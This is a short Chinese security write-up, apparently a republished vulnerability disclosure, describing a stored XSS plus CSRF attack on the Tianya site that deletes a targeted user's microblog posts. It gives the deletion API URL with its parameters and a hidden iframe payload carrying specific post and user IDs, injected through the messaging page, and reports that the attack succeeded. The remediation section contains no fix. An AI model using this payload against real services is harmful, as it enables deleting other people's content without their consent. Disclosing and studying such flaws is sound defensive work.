鸿 网 互 联 www.68idc.cn

当前位置 : 服务器租用 > 网站安全 > 安全设置 > >

天涯CSRF系列三: 结合储存型XSS定向删除指定用户微博(非越权)

来源:互联网 作者:佚名 时间:2015-08-30 06:37
这次我们来看看如何利用XSS结合CSRF打造定向攻击 再来看一下上次(http://www.2cto.com/Article/201310/248998.html)的文件引发的又一个问题 首先抓包拿到删除微博的URL http://www.tianya.cn/api/tw?method=tweet.ice.deleteTweetparams.id=0000000params.d
这次我们来看看如何利用XSS结合CSRF打造定向攻击
 再来看一下上次(http://www.2cto.com/Article/201310/248998.html)的文件引发的又一个问题 
 首先抓包拿到删除微博的URL
 
 
http://www.tianya.cn/api/tw?method=tweet.ice.deleteTweet&params.id=0000000&params.delUserId=0000000
 
 
 
params.id 代表微博的ID
 
params.delUserId 代表所属帐号的ID
 
 
 
首先拿我自己做测试,我先发表一条微博
然后找到该条微博的ID
 
找到用户的ID
来到发送消息的页面
 
构造如下恶意代码:
<iframe style='display:none' src='http://www.tianya.cn/api/tw?method=tweet.ice.deleteTweet&params.id=68541413&params.delUserId=82776194' >
 
发送之后,我们查看源码
 
这时 CSRF+XSS 已经攻击成功,回到首页查看,微博已没。
 
 
修复方案:

幸苦你们了
 
网友评论
<